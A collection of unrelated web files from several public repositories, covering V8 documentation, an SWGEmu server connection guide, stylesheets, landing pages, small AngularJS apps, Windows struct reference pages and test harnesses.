<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
<li><a href="examples.html"><span>Examples</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="inherits.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="namespacev8.html">v8</a></li><li class="navelem"><a class="el" href="classv8_1_1IdleTask.html">IdleTask</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#pub-methods">Public Member Functions</a> |
<a href="classv8_1_1IdleTask-members.html">List of all members</a> </div>
<div class="headertitle">
<div class="title">v8::IdleTask Class Reference<span class="mlabels"><span class="mlabel">abstract</span></span></div> </div>
</div><!--header-->
<div class="contents">
<p><code>#include <<a class="el" href="v8-platform_8h_source.html">v8-platform.h</a>></code></p>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-methods"></a>
Public Member Functions</h2></td></tr>
<tr class="memitem:a4f2f238f551b3b2212adffcd5ee2f314"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a4f2f238f551b3b2212adffcd5ee2f314"></a>
virtual void </td><td class="memItemRight" valign="bottom"><b>Run</b> (double deadline_in_seconds)=0</td></tr>
<tr class="separator:a4f2f238f551b3b2212adffcd5ee2f314"><td class="memSeparator" colspan="2"> </td></tr>
</table>
<a name="details" id="details"></a><h2 class="groupheader">Detailed Description</h2>
<div class="textblock"><p>An <a class="el" href="classv8_1_1IdleTask.html">IdleTask</a> represents a unit of work to be performed in idle time. The Run method is invoked with an argument that specifies the deadline in seconds returned by MonotonicallyIncreasingTime(). The idle task is expected to complete by this deadline. </p>
</div><hr/>The documentation for this class was generated from the following file:<ul>
<li>deps/v8/include/<a class="el" href="v8-platform_8h_source.html">v8-platform.h</a></li>
</ul>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.11
</small></address>
</body>
</html>
|
server/emuyoda/html/views/connect.html
|
Zonama/ZonamaDev
|
<div class="container">
<h4>Getting Connected</h4>
<p>
<div class="panel panel-info" ng-show="server_status.autoreg">
<div class="panel-heading">
<h3 class="panel-title">NOTE: Auto Registration Enabled</h3>
</div>
<div class="panel-body">
<p>NOTE: Autoregistration is enabled, to create a new account when you connect via the client enter any username you desire and the new password. That account will be created on the fly as you login
and this user/password combination will allow you to return to your characters when you login again later.</p>
<p>To disable auto registration edit your bin/config.lua file and change "AutoReg = 1" to "AutoReg = 0" and restart the server.</p>
<div ng-show="server_status.account" class="alert alert-dismissible alert-success">
<b>Login as <u>{{ server_status.account.username }}</u> to create a character with administrator privilages.</b>
</div>
</div>
</div>
<div class="panel panel-primary">
<div class="panel-heading">
<h3 class="panel-title">New Launcher</h3>
</div>
<div class="panel-body">
<p>If you have the new <a href="http://www.swgemu.com/forums/content.php?r=179-Install-SWGEmu" target="_blank">launcher</a>, follow these steps:</p>
<ul>
<li>Click on Settings -> Login Servers -> Add</li>
<p>
<div class="well well-sm">
<p>Name: <b>localserver</b></p>
<p>Host: <b>{{ server_status.server_ip }}</b></p>
<p>Port: <b>{{ server_status.login_port }}</b></p>
</div>
</p>
<li>Hit [OK] to save the new host.</li>
<li>Hit and [OK] to close the Login Servers window.</li>
<li>Choose "localserver" in the dropdown next to the [START] button.</li>
<li>Hit the [START] button and login.</li>
</ul>
<p>Be sure to <a href='#/connect#client-admin' target='_self'>Enable Admin Commands</a> on the client before you launch the client.</p>
</div>
</div>
<div class="panel panel-primary">
<div class="panel-heading">
<h3 class="panel-title">SWGEmu Executable</h3>
</div>
<div class="panel-body">
<p>If you're using the SWGEmu client without the new launcher <i>(not recommended)</i> you can do the following to connect to your server:</p>
<p>Copy and paste this info into swgemu_login.cfg:</p>
<pre>
[ClientGame]
loginServerPort0={{ server_status.login_port }}
loginServerAddress0={{ server_status.server_ip }}
[Station]
subscriptionFeatures=1
gameFeatures=65535</pre>
<p>Launch SWG Emu and login!</p>
</div>
</div>
<div id="client-admin" class="panel panel-warning">
<div class="panel-heading">
<h3 class="panel-title">Enable Admin Commands on Client</h3>
</div>
<div class="panel-body">
<p>Edit the user.cfg file in your SWGEmu folder <i>(Usually C:\SWGEmu\user.cfg)</i></p>
<p>Make sure the file looks like this:</p>
<pre>
[ClientGame]
0fd345d9 = true
[ClientUserInterface]
debugExamine=1</pre>
<p>Edit the swgemu.cfg file in your SWGEmu folder <i>(Usually C:\SWGEmu\swgemu.cfg)</i></p>
<p>Make sure the file looks like this:</p>
<pre>
.include "swgemu_login.cfg"
.include "swgemu_live.cfg"
.include "swgemu_preload.cfg"
.include "options.cfg"
.include "user.cfg"</pre>
<p><b>NOTE: Often times you'll find a '#' character on the .include "user.cfg" line. You must remove that or your user.cfg will not used and admin commands will return "Command Not Found" errors.</b></p>
<p><u>Make sure to exit your client all the way to the windows desktop and re-load it after making these changes.</u></p>
</div>
</div>
</div>
|
src/var.www/report.cgi/html/report_print.css
|
WrathOfChris/chopstix
|
/* $Gateweaver: report_print.css,v 1.4 2007/09/10 15:22:24 cmaxwell Exp $ */
/*
* Copyright (c) 2007 Christopher Maxwell. All rights reserved.
*/
* {
padding: 0;
margin: 0;
border: 0;
}
body, html {
font-family: Verdana, Arial, Helvetica, Geneva, sans-serif;
color: black;
background-color: white;
text-align: center;
}
img {
border: none;
}
a {
text-decoration: none;
border: none;
color: black;
}
#main {
margin: 0 auto;
text-align: left;
}
#left {
min-height: 70px;
}
#footer {
margin 0 auto;
font-size: 50%;
text-align: left;
}
#menu {
display: none;
}
.logo {
float: left;
padding: 0 5px 0 5px;
width: 140px;
}
.row0 {
background-color: #ffffff;
}
.row1 {
background-color: #e8e8e8;
}
/*
* LIST
*/
.list {
font-size: 70%;
}
table.list {
border-collapse: collapse;
margin-bottom: 20px;
}
table.list th {
padding: 4px 4px 4px 4px;
color: #000000;
background-color: #c0c0c0;
text-align: left;
}
table.list td {
border: 1px solid #ffffff;
color: #000000;
padding: 4px 4px 4px 4px;
}
.total hr {
padding: 0px 0px 1px 0px;
color: #000000;
background-color: #000000;
width: 48px;
}
.item {
font-size: 60%;
}
table.item {
margin-bottom: 20px;
border: 1px solid #ffffff;
border-collapse: collapse;
}
table.item th {
padding: 4px 4px 4px 4px;
color: #000000;
background-color: #c0c0c0;
text-align: left;
}
table.item td {
border: 1px solid #ffffff;
color: #000000;
padding: 4px 4px 4px 4px;
}
|
index.html
|
GoaldenHour/goaldenhour.github.io
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Goalden Hour</title>
<meta name="description" content="Goalden Hour launch page">
<meta name="author" content="Spyros Maniatopoulos">
<!-- Favicon
================================================== -->
<link rel="icon" type="image/png" href="img/favicon.png">
<!-- CSS
================================================== -->
<link rel="stylesheet" type="text/css" href="css/foundation.min.css" />
<link rel="stylesheet" type="text/css" href="css/main.css">
<link href='http://fonts.googleapis.com/css?family=Pontano+Sans' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Istok+Web:400,700' rel='stylesheet' type='text/css'>
<!-- Analytics, Social media buttons
================================================== -->
<script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5425d02003853126" async></script>
</head>
<body>
<div id="launch_page_container">
<div class="row">
<p> </p>
<a href="#"><img src = "img/GoaldenHourlogo_icon.png" width="400" alt="Portal Room logo"></a>
</div>
<div id="launch_page_signup_container" class="row">
<h1 class="launch_page_heading">Plan the things that matter to you</h1>
<!-- <h1 class="launch_page_heading">Start working on your goals</h1> -->
<!-- <p class="lead">Align your calendar and to-do list with your long-term goals!</p> -->
<!-- Begin MailChimp Signup Form -->
<div id="mc_embed_signup">
<form action="http://goaldenhour.us9.list-manage.com/subscribe/post?u=6d818feb2a612cc766a2b5a71&id=800d570271" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate>
<div class="row">
<div class="large-8 columns">
<input type="email" value="" name="EMAIL" class="email" id="mce-EMAIL" placeholder="Enter your e-mail address here to get notified when we launch" required>
<!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups-->
<div style="position: absolute; left: -5000px;">
<input type="text" name="b_6d818feb2a612cc766a2b5a71_800d570271" tabindex="-1" value="">
</div>
</div>
<div id="mc-embedded-subscribe_container" class="large-4 columns">
<button id="mc-embedded-subscribe" type="submit" name="subscribe">Keep me posted</button>
</div>
</div>
</form>
</div>
<!-- End mc_embed_signup -->
<!-- <div class="large-6 columns">
<p>One day you will wake up and there won't be any more time to do the things you've always wanted. Do it now.</p>
<small>Paulo Coelho</small>
</div> -->
</div>
<!-- <div id="footer" class="row">
<div class="footer_title large-4 columns">ABOUT
<div class="footer_highlight"></div>
</div>
<div class="footer_title large-4 columns">TEAM
</div>
<div class="footer_title large-4 columns">CONTACT
</div>
</div> -->
</div>
</body>
</html>
|
public/index.html
|
edevregille/node-todo
|
<!doctype html>
<!-- ASSIGN OUR ANGULAR MODULE -->
<html ng-app="appTodo">
<head>
<!-- META -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1"><!-- Optimize mobile viewport -->
<title>Démo Bluemix</title>
<!-- SCROLLS -->
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css"><!-- load bootstrap -->
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.min.css">
<style>
html { overflow-y:scroll; }
body { padding-top:50px; }
#todo-list { margin-bottom:30px; }
#todo-form { margin-bottom:50px; }
p { color: blue; }
</style>
<!-- SPELLS -->
<script src="//ajax.googleapis.com/ajax/libs/angularjs/1.2.16/angular.min.js"></script><!-- load angular -->
<script src="js/controllers/main.js"></script> <!-- load up our controller -->
<script src="js/services/todos.js"></script> <!-- load our todo service -->
<script src="js/core.js"></script> <!-- load our main application -->
</head>
<!-- SET THE CONTROLLER -->
<body ng-controller="mainController">
<div class="container">
<!-- HEADER AND TODO COUNT -->
<div class="jumbotron text-center">
<h1>Todo List sur la plate-forme Cloud d'Innovation Bluemix <span class="label label-info">{{ todos.length }}</span></h1>
</div>
<!-- TODO LIST -->
<div id="todo-list" class="row">
<div class="col-sm-4 col-sm-offset-4">
<!-- LOOP OVER THE TODOS IN $scope.todos -->
<div class="checkbox" ng-repeat="todo in todos">
<label>
<input type="checkbox" ng-click="deleteTodo(todo._id)"> {{ todo.text }}
</label>
</div>
<p class="text-center" ng-show="loading">
<span class="fa fa-spinner fa-spin fa-3x"></span>
</p>
</div>
</div>
<!-- FORM TO CREATE TODOS -->
<div id="todo-form" class="row">
<div class="col-sm-8 col-sm-offset-2 text-center">
<form>
<div class="form-group">
<!-- BIND THIS VALUE TO formData.text IN ANGULAR -->
<input type="text" class="form-control input-lg text-center" placeholder="la vie est belle" ng-model="formData.text">
</div>
<!-- createToDo() WILL CREATE NEW TODOS -->
<button type="submit" class="btn btn-primary btn-lg" ng-click="createTodo()">Add</button>
</form>
</div>
</div>
<div class="text-center text-muted">
<p>Emmanuel de Vregille</p>
<p>Contactez moi pour vos projets Cloud!!!</p>
<p>emmanuel@ie.ibm.com</p>
</div>
</div>
</body>
</html>
|
views/resultados.html
|
chmartinez/test-for-pedro
|
<!DOCTYPE html>
<html ng-app="app1" lang="es">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Elecciones</title>
<script src="/libs/jquery-3.2.0/jquery-3.2.0.js"></script>
<script src="/libs/bootstrap-3.3.7-dist/js/bootstrap.js"></script>
<script src="/libs/angular-1.6.3/angular.js"></script>
<script src="https://angular-ui.github.io/bootstrap/ui-bootstrap-tpls-0.6.0.js"></script>
<link rel="stylesheet" href="/css/bootstrap/css/bootstrap.css" />
<link href="/css/fuentes.css" rel="stylesheet" media="screen">
<script src="/js/controller.js"></script>
<script src="/js/services.js"></script>
</head>
<body ng-controller="mainCtrl" ng-init="initializePartidos();">
<header>
<h1>Resultados</h1>
</header>
<div class="container">
<div class="row">
<div ng-show="validarError" class="alert alert-danger">
<h2>Ha ocurrido algun error...</h2>
<p>{{validarErrorMessage}}</p>
</div>
</div>
<div class="row">
<ul class="media-list">
<li class="media partido sin-fondo" ng-repeat="partido in partidos" ng-click="partidoSeleccionado(partido)">
<div class="media-left">
<a href="#">
<img class="imgPartido img-rounded" ng-src="{{partido.foto}}" />
</a>
</div>
<div class="media-body">
<h3>Partido político: <span>{{partido.nombre}}</span></h3>
<h3>Nombre candidato: <span>{{partido.candidato}}</span></h3>
<div class="row">
<div class="progress">
<div class="progress-bar" role="progressbar" aria-valuenow="{{obtenerPorcentajeDeVotos(partido)}}" aria-valuemin="0" aria-valuemax="100" ng-style="{width: (obtenerPorcentajeDeVotos(partido) + '%')}">
<span>{{obtenerPorcentajeDeVotos(partido)}}% de votos</span>
</div>
</div>
</div>
</div>
</li>
</ul>
</div>
</div>
</body>
</html>
|
material/partials/directives/youtube.html
|
WriterCMS/writercms-themes
|
<iframe class="youtube" ng-src="{{ trustSrc(youtubeSrc) }}"></iframe>
|
documentation/ActorProtocol.html
|
RichardAlexanderGreen/ProgrammingInSimpleEnglish
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 TRANSITIONAL//EN">
<html>
<head>
<title>Actor Protocol</title>
<link href="styles.css" rel=STYLESHEET TYPE="text/css">
</head>
<body>
<h2>Actor Protocol</h2>
<h3>Actor Interface</h3>
<p>
To speak to an actor,
we simply send a statement
along with the objects that the statement references.
If the actor is on the web,
we simply send the request with an HTTP POST.
</p>
<p>
The message sent to the actor is a Hum
<a href="FrameTypes.html#DatatFrame">data frame</a>
and looks like this:
<pre class="example">
---
Data: Action request sent to remote actor.
Action:
. statement: Assemble coffee-drink.
. request: r756446356-33.
. coffee-drink:
. . recipe: latte.
. . decaffeinated: Yes.
. . skim-milk: No.
---
</pre>
<p class="ADVICE">
In the back-plane, the message carries various data
that is used by the delivery system.
For example: unique message identifier, source address, time sent, digital signature.
Because such data serves the back-plane, not the business process,
we do not show that data here.
That data is in the tranport layer, not the actor interface layer.
</p>
<h3>Actor Address</h3>
<p>
The actor's address on the web is a URI that looks like this:
<br/>.
<br/><code>http://www.server.com/.../actor/1234</code>
<br/>.
<br/>where "1234" in the example is the actor's local identifier.
The local identifier can be any string.
We suggest anything that works well in a URI as a good-enough choice.
</p>
<p>
If we need privacy or security, the simple solution is to use HTTPS.
The protocol is otherwise unchanged.
</p>
<h3>Registration</h3>
<p>
The actor registers itself with a Resource Manager
by sending a message to a Resource Manager.
The message is sent with an HTTP POST.
The actor simply tells the manager its address
and a list of the roles it can perform.
Optionally, the actor can give its "quit time"
so that the resource manager will avoid assigning tasks
which would exceed the quit time.
</p>
<p>
The resource manager has a URI that looks like this:
<br/>.
<br/><code>http://www.server.com/.../resourceManager/4321</code>
<br/>.
<br/>where "4321" is the resource manager's local identifier.
</p>
<p>
The message sent to the resource manager is a Hum
<a href="FrameTypes.html#DatatFrame">data frame</a>
and looks like this:
<pre class="example">
---
Data: Remote actor reporting for work.
Event:
. statement: Remote actor is available on schedule enclosed.
. Actor:
. . name: One-Arm Charlie.
. . roles: coffee-mixer, donut-fetcher.
. . address: https://www.coffeeshop314159/robot/OneArmCharlie.
. . key: www.coffeeshop314159/robot/OneArmCharlie.
. Schedule:
. . begin: now.
. . end: 2010.12.31 23:59. (Lease expires.)
---
</pre>
</p>
<h3>Quit</h3>
<p>
The actor can quit (de-register) at any time
as long as it is not currently working a request.
It does that by sending a message to the resource manager.
The "quit notice" is sent in a data frame that looks like this:
<pre class="example">
---
Data: Quit notice.
Event:
. statement: Actor will be unavailable per reason for period.
. actor: www.coffeeshop314159/robot/OneArmCharlie.
. reason: Robot going off-line for safety inspection.
. period:
. . start: now.
. . duration: 30 minutes.
---
</pre>
<h3>Completion Report</h3>
<p>
When an actor completes an request,
it sends back a "completion report"
in a data frame that looks like this:
<pre class="example">
---
Data: Work completion report.
Completion-Report.
. statement: Actor consumed resources while completing request.
. actor: www.coffeeshop314159/robot/OneArmCharlie.
. request: r756446356-33.
. resources:
. . coffee-mech: 47 seconds.
. . milk: 500 ml.
. . expresso: 1 shot.
---
</pre>
</p>
<h3>Trouble Report</h3>
<p>
When an actor cannot complete a request,
it sends back a "trouble report"
in a data frame that looks like this:
<pre class="example">
---
Data: Actor cannot complete assigned request.
Event:
. statement: Actor encountered problem while working request.
. actor: www.coffeeshop314159/robot/OneArmCharlie.
. request: r756446356-33. (request that cannot be completed)
. problem:
. . category: Missing material.
. . reason: Skim milk container is empty.
. . status: Coffee-mech is waiting for material.
---
</pre>
The resource manager will take whatever corrective action
is appropriate to the situation.
Typically, it will refer the problem to a "trouble-shooter" actor
which has the knowledge for coping with troubles.
For example: The trouble-shooter actor could be a human
or a case-based-reasoning system.
In the case above, the actor is waiting for material.
The the trouble-shooter actor could tell the human attendant to re-fill the skim milk container; or, if there is no more skim milk, the trouble-shooter could abort the current order and send a runner to get some skim milk. (In the mean time, operations will be very constrained.)
</p>
</body>
</html>
|
index.html
|
Ravichandrane/Hue
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Hue - Effect</title>
<link href='http://fonts.googleapis.com/css?family=Roboto:400,300' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="style.css">
</head>
<body>
<header id="header">
<h1>Hue Effect</h1>
</header>
</body>
</html>
|
test/index.html
|
knoxHuang/engine
|
<!DOCTYPE HTML>
<html>
<head>
<title> Fire </title>
<style>
body {
margin: 0;
padding: 0;
background-color: #333333;
}
#help {
position: absolute;
z-index: 20;
color: black;
top: 20px;
left: 120px;
}
</style>
<script src="/ext/pixi/bin/pixi.dev.js"></script>
<script src="/ext/fire-core/bin/dev/core.js"></script>
<script src="/bin/dev/engine.js"></script>
</head>
<body>
<script>
// game view
var canvas = Fire.Engine.init(1366, 768).canvas;
document.body.appendChild(canvas);
// scene view
var sceneView = Fire.Engine.createSceneView(512, 512);
document.body.appendChild(sceneView.canvas);
Fire.Engine.play();
var s = new Fire.Entity();
var spriteRenderer = s.addComponent(Fire.SpriteRenderer);
s.transform.position = new Fire.Vec2(0, 10);
var img = new Image();
img.onload = function () {
var sprite = new Fire.Sprite(img);
//sprite.width = 89;
//sprite.height = 44;
//sprite.trimX = 10;
//sprite.trimY = 20;
//sprite.x = 0;
//sprite.y = 49;
sprite.x = 20;
sprite.y = 60;
sprite.width = 40;
sprite.height = 40;
spriteRenderer.sprite = sprite;
s.getComponent(Fire.SpriteRenderer).sprite = sprite;
bigSprite.getComponent(Fire.SpriteRenderer).sprite = sprite;
};
img.src = '../test/assets/atlas (1).png';
var sc = Fire.Entity.createWithFlags('scene camera', Fire._ObjectFlags.Hide);
sceneView.camera = sc.addComponent(Fire.Camera);
var gc = new Fire.Entity('game camera');
gc.addComponent(Fire.Camera);
gc.transform.update = function () {
//this.rotation += 0.03;
};
sc.transform.position = new Fire.Vec2(0, 0);
Fire.Engine._renderContext.checkMatchCurrentScene();
var bigSprite = new Fire.Entity('Big Sprite');
bigSprite.parent = s;
bigSprite.addComponent(Fire.SpriteRenderer);
bigSprite.transform.scale = new Fire.Vec2(5, 5);
bigSprite.transform.setAsFirstSibling();
</script>
</body>
</html>
|
0.4.0/css/questionnaire.css
|
tstephen/questionnaire
|
/* BOOTSTRAP OVERRIDES */
.navbar-brand {
padding: 5px;
}
/* MESSAGES */
#messages {
line-height: 3em;
position: fixed;
top:10%;
width: 80%;
z-index: 100;
}
#messages .glyphicon.text-danger {
color: #a94442 !important;
padding-top: 0.4em;
margin-top: 0.4em;
}
#messages,
.messages,
.instructions {
padding-left: 1em;
padding-right: 1em;
/*font-style: italic;*/
}
.alert-info {
padding: 1em;
}
/* END MESSAGES */
/* FORMS */
section#questionnaireSect section:first-child button.btn.btn-default {
display: none;
}
input.form-error:invalid,
select.form-error:invalid,
textarea.form-error:invalid {
border: solid 1px #f33;
}
input:focus:invalid,
select:focus:invalid,
textarea:focus:invalid {
border: solid 1px #f33 ;
}
/*input ~ .field-hint,
select ~ .field-hint,
textarea ~ .field-hint {
visibility: hidden ;
line-height: 0em;
}*/
input:focus:invalid ~ .field-hint,
select:focus:invalid ~ .field-hint,
textarea:focus:invalid ~ .field-hint {
color: #f33 ;
visibility: visible ;
line-height: 1.5em;
}
.form-group {
clear:both;
}
/* END FORMS */
/*Form Wizard*/
.bs-wizard {margin-top: 40px;}
.bs-wizard {border-bottom: solid 1px #e0e0e0; padding: 0 0 10px 0;}
.bs-wizard > .bs-wizard-step {padding: 0; position: relative;}
.bs-wizard > .bs-wizard-step + .bs-wizard-step {}
.bs-wizard > .bs-wizard-step .bs-wizard-stepnum {color: #595959; font-size: 16px; margin-bottom: 5px;}
.bs-wizard > .bs-wizard-step .bs-wizard-info {color: #999; font-size: 14px;}
.bs-wizard > .bs-wizard-step > .bs-wizard-dot {position: absolute; width: 30px; height: 30px; display: block; background: #fbe8aa; top: 45px; left: 50%; margin-top: -15px; margin-left: -15px; border-radius: 50%;}
.bs-wizard > .bs-wizard-step > .bs-wizard-dot:after {content: ' '; width: 14px; height: 14px; background: #fbbd19; border-radius: 50px; position: absolute; top: 8px; left: 8px; }
.bs-wizard > .bs-wizard-step > .progress {position: relative; border-radius: 0px; height: 8px; box-shadow: none; margin: 20px 0;}
.bs-wizard > .bs-wizard-step > .progress > .progress-bar {width:0px; box-shadow: none; background: #fbe8aa;}
.bs-wizard > .bs-wizard-step.complete > .progress > .progress-bar {width:100%;}
.bs-wizard > .bs-wizard-step.active > .progress > .progress-bar {width:50%;}
.bs-wizard > .bs-wizard-step:first-child.active > .progress > .progress-bar {width:0%;}
.bs-wizard > .bs-wizard-step:last-child.active > .progress > .progress-bar {width: 100%;}
.bs-wizard > .bs-wizard-step.disabled > .bs-wizard-dot {background-color: #f5f5f5;}
.bs-wizard > .bs-wizard-step.disabled > .bs-wizard-dot:after {content: ' '; width: 14px; height: 14px; background: buttonface; border-radius: 50px; position: absolute; top: 8px; left: 8px; }
.bs-wizard > .bs-wizard-step:first-child > .progress {left: 50%; width: 50%;}
.bs-wizard > .bs-wizard-step:last-child > .progress {width: 50%;}
/*END Form Wizard*/
/* PACE.JS */
.pace {
-webkit-pointer-events: none;
pointer-events: none;
-webkit-user-select: none;
-moz-user-select: none;
user-select: none;
}
.pace-inactive {
display: none;
}
.pace .pace-progress {
background: #0072ce;
position: fixed;
z-index: 2000;
top: 0;
right: 100%;
width: 100%;
height: 2px;
}
/* END PACE.JS */
|
public/Windows 10 x64 (18363.592)/_PCW_REGISTRATION_INFORMATION.html
|
epikcraw/ggool
|
<html><body>
<h4>Windows 10 x64 (18363.592)</h4><br>
<h2>_PCW_REGISTRATION_INFORMATION</h2>
<font face="arial"> +0x000 Version : Uint4B<br>
+0x008 Name : Ptr64 <a href="./_UNICODE_STRING.html">_UNICODE_STRING</a><br>
+0x010 CounterCount : Uint4B<br>
+0x018 Counters : Ptr64 <a href="./_PCW_COUNTER_DESCRIPTOR.html">_PCW_COUNTER_DESCRIPTOR</a><br>
+0x020 Callback : Ptr64 long <br>
+0x028 CallbackContext : Ptr64 Void<br>
</font></body></html>
|
public/Windows 10 x64 (18363.657)/_ETW_HW_TRACE_EXT_INTERFACE.html
|
epikcraw/ggool
|
<html><body>
<h4>Windows 10 x64 (18363.657)</h4><br>
<h2>_ETW_HW_TRACE_EXT_INTERFACE</h2>
<font face="arial"> +0x000 StartProcessorTraceOnEachCore : Ptr64 long <br>
+0x008 StopProcessorTraceOnEachCore : Ptr64 long <br>
+0x010 LogProcessorTraceOnCurrentCore : Ptr64 long <br>
</font></body></html>
|
2012-04/2012-04-13--4-if/index.html
|
limitist-log/limitist-log.github.io
|
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
</head>
<body>
<div style="text-align: center; height: 75px; padding:1px; text-transform:capitalize; background-color:#42a5f5; color:white">
<h1 style="margin-bottom:-10px; "><a style="text-decoration: none; color:white;"href="/">Single Template - page</a></h1>
</div>
<div style="margin:25px;">
<h1>폭발하는 잉여력 4 만약 드로우썸띵이 옛날 컴퓨터 게임이었다면 if</h1>
<div style="color:grey; font-size:16px;">Friday, Apr 13, 2012</div>
<div style="color:grey; font-size:16px;"></div>
<div style="font-size:18px;">
<div style="position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;">
<iframe src="//www.youtube.com/embed/gdk0IG6mSy4" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;" allowfullscreen title="YouTube Video"></iframe>
</div>
<p>폭발하는 잉여력 (4)</p>
<p>만약 드로우썸띵이 옛날 컴퓨터 게임이었다면…<br />
If DrawSomething were an old pc game </p>
</div>
</div>
<div style="height:35px;"></div>
<div style=" position:fixed; color: white; height:35px; background-color:#757575; bottom:0px; text-align:center; width:99%">
<p style="margin:10px; "><a style="color: white; " target="_blank" href="http://www.giraffeacademy.com/">Giraffe Academy</a> - Hugo Theme</p>
</div>
</body>
</html>
|
index.css
|
FreeAdvice/freeadvice.github.io
|
body {
margin: 0;
padding: 0;
}
.container {
box-sizing: border-box;
display: flex;
flex-direction: column;
align-items: center;
height: 100vh;
}
*, *:before, *:after {
box-sizing: inherit;
}
.navbar {
display: flex;
flex-direction: row;
justify-content: flex-end;
width:100%;
height: 115px;
min-height: 115px;
max-height: 115px;
padding-left: 15px;
z-index: 1;
box-shadow: 0 2px 5px 0 rgba(0, 0, 0, 0.16), 0 2px 10px 0 rgba(0, 0, 0, 0.12);
background-color: white;
}
.welcome {
margin-right: auto;
padding-left: 50px;
font-weight: 900;
font-size: 25px;
line-height: 115px;
font-family: 'Source Sans Pro', sans-serif;
}
.logo {
width: 75px;
margin-left: 25px;
margin-right: 25px;
}
.menu {
display: flex;
height: 100%;
margin-right: 50px;
flex-direction: row;
flex-wrap: nowrap;
align-items: stretch;
justify-content: center;
font-weight: 900;
font-family: 'Source Sans Pro', sans-serif;
}
.item {
width: 180px;
font-size: 20px;
text-align: center;
line-height: 100px;
padding: 10px;
/*border-left: 1px solid #fd3b05;*/
cursor: default;
}
.item:not(.item-isSelected) {
cursor: pointer;
}
/*.item:last-child { border-right: 1px solid #fd3b05; }*/
.item:hover:not(.item-isSelected) {
background-color: #fd8868;
color: white;
}
.item-isSelected {
background-color: #fd3b05;
color: white;
}
.pages {
width: 100%;
height: 100%;
}
.hidden {
height: 0px;
}
/******************************************************************************
ASK AN EXPERT
******************************************************************************/
.page-chat {
position: relative;
height: 100%;
}
.chat {
position:absolute;
width: 100%;
height: calc(100% - 115px);
border: 0;
}
.help {
background-color: rgba(255,255,255,1);
position:fixed;
bottom: 0px;
right: 0px;
width: 42px;
height: 42px;
}
/******************************************************************************
FAQ
******************************************************************************/
.page-waffle {
position: relative;
height: 100%;
background-color: #ebebeb;
}
.waffleboard {
position:absolute;
top: -40px;
left: -48px;
width: 100%;
height: calc(100% - 75px);
border: 0;
}
/******************************************************************************
ABOUT
******************************************************************************/
.page-about {
display: flex;
justify-content: center;
height: 100%;
overflow: scroll;
}
.about {
width: 50%;
}
.about h1 {
margin-top: 50px;
font-size: 1.3em;
}
.about h3 {
margin-top: 50px;
font-size: 1em;
}
.about p {
text-align: justify;
}
.sponsor {
display: flex;
flex-direction: column;
justify-content: center;
align-items: center;
margin-top: 50px;
margin-bottom: 200px;
}
.sponsor svg {
margin-left: 60px;
}
.sponsor img {
height: 160px;
padding-top: 45px;
}
.sponsor-logos {
display: flex;
}
.sponsor-logos > div {
margin: 30px;
}
|
tests/unit/index.html
|
ryancookdev/canvas-chess
|
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Canvas Chess Tests</title>
<link rel="stylesheet" href="http://code.jquery.com/qunit/qunit-1.18.0.css">
</head>
<body>
<div id="qunit"></div>
<div id="qunit-fixture"></div>
<script src="http://code.jquery.com/qunit/qunit-1.18.0.js"></script>
<!-- Modules -->
<script src="../../src/assert.js"></script>
<script src="../../src/square.js"></script>
<script src="../../src/move.js"></script>
